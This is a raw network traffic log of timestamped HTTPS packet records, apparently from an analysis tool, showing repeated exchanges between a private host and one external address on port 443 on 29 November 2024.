Nov 29, 2024 12:28:11.653239965 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.656599998 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.656838894 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.656917095 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.656969070 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.657026052 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.657121897 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.657130957 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.657265902 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.657272100 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.657279015 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.657286882 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.657533884 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.657655954 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.674047947 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.674060106 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.674072981 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.674206972 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.674213886 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.674226999 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.674245119 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.674535990 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.674546003 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.695168018 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.701421976 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.726469994 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.726764917 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.726914883 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.726919889 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.727072954 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.727206945 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.730628967 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.747494936 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.752758026 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.752933025 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.752939939 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.752950907 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.753103018 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.753108978 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.753114939 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.753120899 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.753125906 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.753459930 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.753465891 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.753473997 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.753632069 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:11.763997078 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:11.767467976 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.014894009 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.033581018 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.038721085 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.038774967 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.039025068 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.039031982 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.039040089 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.039043903 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.039129972 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.052300930 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.063704967 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.069891930 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.070116997 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.070173025 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.070197105 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.070204973 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.070216894 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.075686932 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.100852013 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.107408047 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.107419968 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.107548952 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.107553959 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.107568026 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.107748032 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.115726948 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.178430080 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.178670883 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.178759098 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.386349916 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.393832922 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.394184113 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.394191980 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.394197941 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.394289970 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.394295931 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.394390106 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.394435883 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.394442081 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.394448996 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.394615889 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.394741058 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.394859076 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.408108950 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.410010099 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.414402962 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.414623022 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.414760113 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.414767981 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.414833069 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.414844990 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.414896965 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.428157091 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.451834917 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.456537008 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.456671953 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.456742048 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.456748009 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.456896067 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.456902981 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.456913948 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.456918955 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.456984997 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.472520113 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.512384892 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.512393951 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.512398005 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.517509937 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.518127918 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.518210888 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.518682003 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.518688917 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.518696070 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.518707991 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.518714905 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.518721104 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.518728018 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.519016027 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.519136906 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.519334078 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.532708883 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.532722950 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.532728910 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.532736063 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.532744884 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.532751083 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.532847881 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.532855034 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.532867908 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.533709049 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.539997101 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.540019989 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.540129900 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.540143967 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.540152073 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.540164948 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.540282965 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.540288925 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.540857077 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.540870905 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.554337978 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.554352999 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.554368973 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.554374933 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.554380894 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.554389954 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.554464102 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.554471016 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.554476976 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.554492950 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.562212944 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.562459946 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.563299894 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.563606977 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.563707113 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.564357042 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.592448950 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.594502926 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.597404957 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.613027096 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.744086981 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.755052090 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.763928890 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.774851084 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.774883986 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.774936914 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.774945974 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.774954081 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.775413990 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.779947042 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.806895971 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.811682940 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.811836958 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.811911106 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.811917067 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.811984062 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.812129974 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.816636086 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.879409075 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.926724911 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.927474976 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.932970047 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.933360100 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.933619976 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.933655977 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.933664083 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.933799028 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.933806896 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.933831930 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.933837891 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.934113979 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.934120893 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.934128046 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.934132099 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.934504032 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.945437908 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.945518017 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.945525885 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.945616007 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.945651054 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.945657015 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.945662975 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.945936918 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.945943117 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.945950985 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.946031094 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.946118116 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.953176975 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.954504013 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.956195116 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.956238985 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.956244946 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.956387043 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.956393003 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.956399918 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:12.957771063 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:12.988684893 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.077301979 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.082606077 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.083255053 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.083302975 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.083309889 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.083348036 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.083502054 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.083511114 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.083523035 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.083529949 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.083745956 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.083750963 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.114995956 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.115744114 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.121474981 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.121541977 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.121645927 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.121655941 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.121803999 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.143322945 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.154133081 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.167042017 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.167102098 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.167176008 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.167200089 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.167213917 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.167455912 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.167462111 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.167468071 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.167474031 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.167479992 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.167494059 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.167602062 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.167865992 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.178497076 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.178565025 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.207500935 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.290932894 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.290944099 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.304886103 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.305238962 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.305421114 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.305428028 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.305480957 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.305520058 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.305532932 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.305713892 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.305749893 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.305757046 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.305763006 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.305773973 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.306073904 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.321432114 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.321476936 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.321484089 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.321700096 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.321706057 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.321717978 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.321723938 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.322048903 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.348088980 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.386835098 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.388470888 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.443115950 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.457245111 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.476495028 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.483082056 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.483217001 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.483341932 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.483349085 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.483382940 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.483515024 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.512533903 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.524619102 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.540448904 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.670588970 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.719971895 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.725553989 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.725605011 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.725730896 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.725744963 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.725754976 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.725760937 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.725943089 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.730381966 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.730490923 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.730540991 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.730545998 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.731137037 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.731678009 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.744704008 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.790539980 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.795206070 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.795241117 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.795249939 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.795591116 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.832570076 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.841538906 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.870237112 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.873795986 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.877557039 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.878230095 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.878917933 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.878977060 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.878983021 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.879136086 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.879142046 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.879153967 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.879159927 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.879451036 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.879456997 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.879468918 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.879725933 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:13.889139891 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.889178038 CET	443	62648	23.209.72.43	192.168.2.8
